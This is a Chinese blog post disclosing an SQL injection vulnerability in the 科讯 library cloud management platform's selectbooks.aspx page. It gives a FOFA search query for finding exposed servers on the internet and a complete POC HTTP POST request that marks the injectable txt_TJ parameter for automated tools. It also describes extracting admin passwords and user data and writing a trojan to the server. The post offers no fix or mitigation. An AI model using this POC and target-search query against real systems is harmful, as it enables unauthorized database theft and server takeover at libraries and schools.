科讯图书馆综合管理云平台selectbooks.aspx存在SQL注入漏洞

已于 2024-07-26 09:51:36 修改
阅读量269 收藏
点赞数 2
文章标签: sql web安全
于 2024-07-26 09:51:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77012231/article/details/140707329
版权

漏洞描述

科讯图书馆综合管理云平台selectbooks.aspx存在SQL注入,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

复现环境

FOFA

title=="	欢迎使用 图书馆云平台"

资产详情

漏洞复现

POC

POST /selectbooks.aspx HTTP/1.1
Host: 127.0.0.1
Content-Length: 6069
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://127.0.0.1/selectbooks.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTE2MzU3Njc5ODMPZBYCAgMPZBYKZg8QDxYGHg1EYXRhVGV4dEZpZWxkBQRuYW1lHg5EYXRhVmFsdWVGaWVsZAUCaWQeC18hRGF0YUJvdW5kZ2QQFQwe5bm%2F5b635biC5a6e6aqM5bCP5a2m6KW%2F5qCh5Yy6HuW5v%2BW%2Bt%2BW4guWunumqjOWwj%2BWtpuWMl%2BagoeWMuhvlub%2FlvrfluILnp5HliJvlrp7pqozlrabmoKEe5bm%2F5b635biC5ruo5rKz5a2m5qCh5Lit5a2m6YOoHuW5v%2BW%2Bt%2BW4gua7qOays%2BWtpuagoeWwj%2BWtpumDqB7lub%2FlvrfluILlrp7pqozlsI%2FlrabljZfmoKHljLoq5bm%2F5b635biC5qGD5bee5Lit5a2m5pWZ6IKy6ZuG5Zui5Y2X5qCh5Yy6FeW5v%2BW%2Bt%2BW4guS4nOS6reS4reWtph7lub%2FlvrfluILmoYPlt57kuIDlsI%2FkuJzmoKHljLob5bm%2F5b635biC6YKx5p2R5Lit5b%2BD5bCP5a2mHuW5v%2BW%2Bt%2BW4guahg%2BW3nuWbm%2BWwj%2BWNl%2BagoeWMugbmiYDmnIkVDAEzAjEzAjE1ATQBNQE2ATcBOQIxMAIxMQIxMgEwFCsDDGdnZ2dnZ2dnZ2dnZxYBZmQCAQ8QDxYGHwAFDOmmhuiXj%2BS9jee9rh8BBQzppobol4%2FkvY3nva4fAmdkEBUBBuaJgOaciRUBBuaJgOaciRQrAwFnZGQCBg8WAh4LXyFJdGVtQ291bnQCFBYoZg9kFgJmDxUKEuajruael%2BmHjOeahOa4uOaIjxE5NzgtNy0wMi0wMTQ3MjUtMBwo55Ge5YW4KeiQqOaLicK36LCi5biV5b636JGXFeS6uuawkeaWh%2BWtpuWHuueJiOekvgNHODkHNDAuMDAwMAZHODkvMzYe5bm%2F5b635biC5a6e6aqM5bCP5a2m6KW%2F5qCh5Yy6BjAwOTAzMwQ3MTE2ZAIBD2QWAmYPFQoS5qOu5p6X6YeM55qE5ri45oiPETk3OC03LTAyLTAxNDcyNS0wHCjnkZ7lhbgp6JCo5ouJwrfosKLluJXlvrfokZcV5Lq65rCR5paH5a2m5Ye654mI56S%2BA0c4OQc0MC4wMDAwBkc4OS8zNh7lub%2FlvrfluILlrp7pqozlsI%2Flrabopb%2FmoKHljLoGMDA5MDMyBDcxMTdkAgIPZBYCZg8VCg%2FlvIDlrabnrKzkuIDor74ROTc4LTctMDItMDEzOTgyLTgP6K645paH5bm%2F5Li757yWFeS6uuawkeaWh%2BWtpuWHuueJiOekvgNHNDAHMzcuNTAwMAdHNDAvMzoxHuW5v%2BW%2Bt%2BW4guWunumqjOWwj%2BWtpuilv%2BagoeWMugYwMDgwNTIEODA5NGQCAw9kFgJmDxUKD%2BW8gOWtpuesrOS4gOivvhE5NzgtNy0wMi0wMTM5ODItOA%2Forrjmloflub%2FkuLvnvJYV5Lq65rCR5paH5a2m5Ye654mI56S%2BA0c0MAczNy41MDAwB0c0MC8zOjEe5bm%2F5b635biC5a6e6aqM5bCP5a2m6KW%2F5qCh5Yy6BjAwODA1MQQ4MDk1ZAIED2QWAmYPFQoP5byA5a2m56ys5LiA6K%2B%2BETk3OC03LTAyLTAxMzk4Mi04D%2BiuuOaWh%2BW5v%2BS4u%2Be8lhXkurrmsJHmloflrablh7rniYjnpL4DRzQwBzM3LjUwMDAHRzQwLzM6MR7lub%2FlvrfluILlrp7pqozlsI%2Flrabopb%2FmoKHljLoGMDA4MDUwBDgwOTZkAgUPZBYCZg8VCg%2FlvIDlrabnrKzkuIDor74ROTc4LTctMDItMDEzOTgyLTgP6K645paH5bm%2F5Li757yWFeS6uuawkeaWh%2BWtpuWHuueJiOekvgNHNDAHMzcuNTAwMAdHNDAvMzoyHuW5v%2BW%2Bt%2BW4guWunumqjOWwj%2BWtpuilv%2BagoeWMugYwMDgwNDkEODA5N2QCBg9kFgJmDxUKD%2BW8gOWtpuesrOS4gOivvhE5NzgtNy0wMi0wMTM5ODItOA%2Forrjmloflub%2FkuLvnvJYV5Lq65rCR5paH5a2m5Ye654mI56S%2BA0c0MAczNy41MDAwB0c0MC8zOjIe5bm%2F5b635biC5a6e6aqM5bCP5a2m6KW%2F5qCh5Yy6BjAwODA0OAQ4MDk4ZAIHD2QWAmYPFQoP5byA5a2m56ys5LiA6K%2B%2BETk3OC03LTAyLTAxMzk4Mi04D%2BiuuOaWh%2BW5v%2BS4u%2Be8lhXkurrmsJHmloflrablh7rniYjnpL4DRzQwBzM3LjUwMDAHRzQwLzM6Mh7lub%2FlvrfluILlrp7pqozlsI%2Flrabopb%2FmoKHljLoGMDA4MDQ3BDgwOTlkAggPZBYCZg8VCgznjI7kurrnrJTorrAROTc4LTctMDItMDEzNzM4LTEUKOS%2FhCnlsaDmoLzmtoXlpKvokZcV5Lq65rCR5paH5a2m5Ye654mI56S%2BBEk1MTIHMjkuMDAwMAdJNTEyLzM2HuW5v%2BW%2Bt%2BW4guWunumqjOWwj%2BWtpuilv%2BagoeWMugYwMDY1NzMEOTU2N2QCCQ9kFgJmDxUKDOeMjuS6uueslOiusBE5NzgtNy0wMi0wMTM3MzgtMRQo5L%2BEKeWxoOagvOa2heWkq%2BiRlxXkurrmsJHmloflrablh7rniYjnpL4ESTUxMgcyOS4wMDAwB0k1MTIvMzYe5bm%2F5b635biC5a6e6aqM5bCP5a2m6KW%2F5qCh5Yy6BjAwNjU3MgQ5NTY4ZAIKD2QWAmYPFQoM54yO5Lq656yU6K6wETk3OC03LTAyLTAxMzczOC0xFCjkv4Qp5bGg5qC85raF5aSr6JGXFeS6uuawkeaWh%2BWtpuWHuueJiOekvgRJNTEyBzI5LjAwMDAHSTUxMi8zNh7lub%2FlvrfluILlrp7pqozlsI%2Flrabopb%2FmoKHljLoGMDA2NTcxBDk1NjlkAgsPZBYCZg8VChPovrnln44g5rmY6KGM5pWj6K6wETk3OC03LTAyLTAxMzc3NC05DOayiOS7juaWh%2BiRlxXkurrmsJHmloflrablh7rniYjnpL4ESTI0NgcyOC4wMDAwB0kyNDYvMTce5bm%2F5b635biC5a6e6aqM5bCP5a2m6KW%2F5qCh5Yy6BjAwNjU2NwQ5NTczZAIMD2QWAmYPFQoT6L655Z%2BOIOa5mOihjOaVo%2BiusBE5NzgtNy0wMi0wMTM3NzQtOQzmsojku47mlofokZcV5Lq65rCR5paH5a2m5Ye654mI56S%2BBEkyNDYHMjguMDAwMAdJMjQ2LzE3HuW5v%2BW%2Bt%2BW4guWunumqjOWwj%2BWtpuilv%2BagoeWMugYwMDY1NjYEOTU3NGQCDQ9kFgJmDxUKE%2Bi%2BueWfjiDmuZjooYzmlaPorrAROTc4LTctMDItMDEzNzc0LTkM5rKI5LuO5paH6JGXFeS6uuawkeaWh%2BWtpuWHuueJiOekvgRJMjQ2BzI4LjAwMDAHSTI0Ni8xNx7lub%2FlvrfluILlrp7pqozlsI%2Flrabopb%2FmoKHljLoGMDA2NTY1BDk1NzVkAg4PZBYCZg8VCgnlsI%2FnjovlrZAROTc4LTctMDItMDE0NTU3LTc1KOazlSnlnKPln4PlhYvnta7kvanph4woQW50b2luZSBkZSBTYWludC1FeHVww6lyeSnokZcV5Lq65rCR5paH5a2m5Ye654mI56S%2BBEk1NjUHNDguMDAwMAdJNTY1LzQ5HuW5v%2BW%2Bt%2BW4guWunumqjOWwj%2BWtpuilv%2BagoeWMugYwMDM4NzYFMTIyNThkAg8PZBYCZg8VCgnlsI%2FnjovlrZAROTc4LTctMDItMDE0NTU3LTc1KOazlSnlnKPln4PlhYvnta7kvanph4woQW50b2luZSBkZSBTYWludC1FeHVww6lyeSnokZcV5Lq65rCR5paH5a2m5Ye654mI56S%2BBEk1NjUHNDguMDAwMAdJNTY1LzQ5HuW5v%2BW%2Bt%2BW4guWunumqjOWwj%2BWtpuilv%2BagoeWMugYwMDM4NzUFMTIyNTlkAhAPZBYCZg8VCgnlsI%2FnjovlrZAROTc4LTctMDItMDE0NTU3LTc1KOazlSnlnKPln4PlhYvnta7kvanph4woQW50b2luZSBkZSBTYWludC1FeHVww6lyeSnokZcV5Lq65rCR5paH5a2m5Ye654mI56S%2BBEk1NjUHNDguMDAwMAdJNTY1LzQ5HuW5v%2BW%2Bt%2BW4guWunumqjOWwj%2BWtpuilv%2BagoeWMugYwMDM4NzQFMTIyNjBkAhEPZBYCZg8VCgjnroDCt%2BeIsRE5NzgtNy0wMi0wMTM3MjAtNhwo6IuxKeWkj%2Ba0m%2BiSgsK35YuD5pyX54m56JGXFeS6uuawkeaWh%2BWtpuWHuueJiOekvgRJNTYxBzQ1LjAwMDAHSTU2MS80Nx7lub%2FlvrfluILlrp7pqozlsI%2Flrabopb%2FmoKHljLoGMDAzNzIwBTEyNDE0ZAISD2QWAmYPFQoI566AwrfniLEROTc4LTctMDItMDEzNzIwLTYcKOiLsSnlpI%2FmtJvokoLCt%2BWLg%2Bacl%2BeJueiRlxXkurrmsJHmloflrablh7rniYjnpL4ESTU2MQc0NS4wMDAwB0k1NjEvNDce5bm%2F5b635biC5a6e6aqM5bCP5a2m6KW%2F5qCh5Yy6BjAwMzcxOQUxMjQxNWQCEw9kFgJmDxUKCOeugMK354ixETk3OC03LTAyLTAxMzcyMC02HCjoi7Ep5aSP5rSb6JKCwrfli4PmnJfnibnokZcV5Lq65rCR5paH5a2m5Ye654mI56S%2BBEk1NjEHNDUuMDAwMAdJNTYxLzQ3HuW5v%2BW%2Bt%2BW4guWunumqjOWwj%2BWtpuilv%2BagoeWMugYwMDM3MTgFMTI0MTZkAgwPDxYCHgRUZXh0BQM1MTZkZAINDw8WAh8EBQUxMDMxM2RkZACQ8JDBn1ai48ALQHhH669cSBkOYcTrKpiV%2B%2F1aZ16C&__VIEWSTATEGENERATOR=D304C484&__EVENTVALIDATION=%2FwEdABfSQ9wqLAjVbFJQA431hgLGsdFSvGsZawyu6mJ6VOz4BI8rADU8sXOhSLaviOV4heGilhohAWBIH47hveLPz2QPOLiH5BfXwJz%2ByVnBwuOK7AwuPS2UTk4279fGovw%2FgCh44cW%2F5NaOpiC%2FiXwjETHVpiTmOPljEzLBH4uwA7HVmZIDcOlsGdTFEqpu1QEQvmH6aevTmZ79Zm6V6cAUcycwNjWRX3uPAR9sIvvHdxNijlVPG5NNWrm5ssqiOBfsDPzkp9zkEY3WOfxK4NLTe%2FiOswdsiIiymO1WE%2FYkGOt4ABdSB8I4F8xP93jrQQG3%2FtfmSwHrb0Z9Yj1fmyd7BopmieJgJfPaOO4tPfGglCQbdZlykKxse%2FY1k8PBPoLi%2FYRYkyZxCG07DnSGbtWANXTK4SqpLxzBmGeF9DLtbxZNnDhOwJBfJwLozHC02yp2MAvyJ9DfARXcGJL9%2By%2BZHLJDTssYVuALS7OrnWH4GWFVPMazarn7Pc6eNlPES%2BVfxyB42kYym9ygQ8qkVPSmPGQU&Years=2024&ddl_address=3&dll_Collection=%E6%89%80%E6%9C%89&seleTJ=1&txt_TJ=1*&btn_sel=

马船长
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
科迅图书馆云平台 WebCloud.asmx SQL注入致RCE漏洞复现
0xSec
05-30 577
科迅图书馆云平台 WebCloud.asmx接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
科讯校园一卡通管理系统 多处SQL注入致RCE漏洞复现
0xSec
07-24 2741
科讯校园一卡通管理系统 get_kq_tj_today、dormitoryHealthRanking、DataService.asmx等多处接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
科迅图书馆云平台SQL注入漏洞
weixin_43167326的博客
05-30 674
JEPaaS 低代码平台 accessToTeanantInfo SQL注入漏洞,黑客可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
科讯档案管理系统reports_borrow.aspx接口存在SQL注入漏洞
2301_77012231的博客
07-26 214
安徽科迅教育装备20年来来始终坚持智慧校园集成方案产品的开发和部署应用,我们有完善的智慧校园和数字校园建设方案,根据不同的学校不同的实际情况量身定做系统集成方案。产品主要是为了实现校园的智慧网络、智慧OA、智慧教学、智慧学习、数字医疗、智慧安防、智慧平台、校园一卡通智慧结算等。科讯档案管理系统reports_borrow.aspx接口存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。POC。
科讯一卡通管理系统getRechargeToICCard存在SQL注入漏洞
weixin_43167326的博客
07-22 1033
随着信息化技术的不断发展和普及,传统的校园卡已经无法满足学生和学校的需求。学生需要更加便捷、快速的服务,学校需要更加高效、智能的管理方式。因此,智慧校园一卡通系统应运而生。校园一卡通”可广泛用于门禁、图书馆登记、网络教室上机、签到、就餐、消费、圈存等,利用先进的信息技术,逐步实现学校的数字化、网络化、虚拟化和智能化,大力推进教育信息化,加快实现素质教育和教育跨越式发展的战略目标,最终实现“一卡在手,走遍校园”。
科迅OA办公系统存在SQL注入漏洞
2301_77012231的博客
08-14 198
安徽科迅教育装备20年来来始终坚持智慧校园集成方案产品的开发和部署应用,我们有完善的智慧校园和数字校园建设方案,根据不同的学校不同的实际情况量身定做系统集成方案。产品主要是为了实现校园的智慧网络、智慧OA、智慧教学、智慧学习、数字医疗、智慧安防、智慧平台、校园一卡通智慧结算等。科迅OA办公系统存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。
科讯一卡通管理系统get_kq_record存在SQL注入漏洞
xiaokp7的博客
07-24 91
随着信息化技术的不断发展和普及,传统的校园卡已经无法满足学生和学校的需求。学生需要更加便捷、快速的服务,学校需要更加高效、智能的管理方式。因此,智慧校园一卡通系统应运而生。校园一卡通”可广泛用于门禁、图书馆登记、网络教室上机、签到、就餐、消费、圈存等,利用先进的信息技术,逐步实现学校的数字化、网络化、虚拟化和智能化,大力推进教育信息化,加快实现素质教育和教育跨越式发展的战略目标,最终实现“一卡在手,走遍校园”。
科讯档案管理系统存在SQL注入漏洞(0day)
2301_77012231的博客
08-26 301
安徽科迅教育装备20年来来始终坚持智慧校园集成方案产品的开发和部署应用,我们有完善的智慧校园和数字校园建设方案,根据不同的学校不同的实际情况量身定做系统集成方案。产品主要是为了实现校园的智慧网络、智慧OA、智慧教学、智慧学习、数字医疗、智慧安防、智慧平台、校园一卡通智慧结算等。科讯档案管理系统多接口存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。
kesioncms (科讯cms) 6.x-8.x版本写入任意内容文件漏洞
收集盒 Book box
04-20 5885
发布时间:2013-04-08  关键词:kesioncms 漏洞 漏洞版本:kesioncms(科讯cms) 6.x - 8.x 漏洞简介:未对提交参数判断,导致可将任意内容的文件写入网站服务器 漏洞代码: Wap/Plus/PhotoVote.asp中: Dim KS:Set KS=New PublicCls Dim ID:ID= Replace(KS.S("I
科讯电子图书馆管理系统.pdf
10-14
科讯电子图书馆管理系统.pdf
KesionCMS 科讯万能建站系统 GBK X1.0.150526
10-09
【KesionCMS 科讯万能建站系统 GBK X1.0.150526】是一款由漳州科兴信息技术有限公司精心打造的高效、全能的网站构建平台。这款CMS(内容管理系统)以其模块化的开发方式和强大的功能集成为业界所熟知,是众多企业和...
科讯CMS内容管理系统》指导书.doc
06-18
科讯CMS内容管理系统》指导书知识点总结 《科讯CMS内容管理系统》指导书是一本关于内容管理系统的指导书,主要面向中小企业网站建设的需求。下面是从指导书中提炼出的知识点: 一、内容管理系统(CMS)概念 * ...
SQL统计行数的语句
曹昆的技术博客
08-27 377
SQL 中,你可以使用 COUNT() 函数来统计查询结果的行数。这个函数可以用在不同的上下文中,具体取决于你想要统计的内容。
SQL经典五十道选刷
最新发布
m0_67496588的博客
08-31 456
SQL经典五十道选刷
SQL进阶技巧:如何查询最近一笔有效订单? | 近距离有效匹配问题
石榴姐yyds
08-29 118
本文所分析的案例在实际场景中经常被用到,对于支持lag()函数 ignore nulls语法的数据库,本问题就很简单,但对于Hive等数据库不支持该语法时,略会麻烦一些,针对本题我们采用一分为二的方式,对订单有效和无效分开求解,当为有效值时候,利用ag()函数正常求解,当为无效时候,由于会存在多个连续状态一致的,为了能够获取最近有效的状态,我们采用last_value()函数ignore nulls语法来实现,最终通过coalesce()函数将两种状态合并,得到最终的结果。
Python知识点:如何使用SQLAlchemy进行ORM(对象关系映射)
码农超哥的博客
08-31 346
定义数据库表的ORM模型。每个模型类都需要继承自Base,并且通常以类的属性形式定义表的列。
SQL 注入新视角:堆查询、JSON 与头部 XFF 注入剖析及防范
2301_77160226的博客
08-27 2146
SQL 注入攻击的世界中,除了一些常见的注入方式外,还有堆查询注入、JSON 注入以及头部 XFF 注入等较为特殊的攻击手段。这些攻击方式利用不同的场景和漏洞,对数据库安全构成严重威胁。本文将详细介绍这三种 SQL 注入攻击方式的原理和特点。
科讯cms 多选sql标签
12-23
科讯CMS是一个功能强大的内容管理系统,其中有丰富的标签功能,可以方便用户进行网站内容的管理和定制。其中,多选SQL标签是一种非常实用的标签,可以在页面中进行多种数据源的选择和展示。 使用多选SQL标签,用户可以方便地从数据库中选择多个数据源,比如文章、产品、用户等,并且可以按照一定的条件筛选出需要的数据进行展示。这样,用户就可以在网站页面上展示多个数据源的内容,为网站的内容丰富性和多样性提供了很大的方便。 在使用多选SQL标签时,用户可以根据自己的需求进行筛选和排序,可以设置不同的展示方式,比如列表展示、瀑布流展示等,满足了用户不同的展示需求。同时,多选SQL标签还提供了丰富的样式定制功能,用户可以根据自己的网站风格进行样式的定制,使得展示的内容更加符合网站整体的风格和需求。 总的来说,科讯CMS的多选SQL标签功能非常强大,可以满足用户在网站内容展示方面的多种需求,为网站的内容管理和展示提供了非常便利的工具和功能,使得用户可以更加灵活地定制和展示网站的内容,提升网站的用户体验和内容质量。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值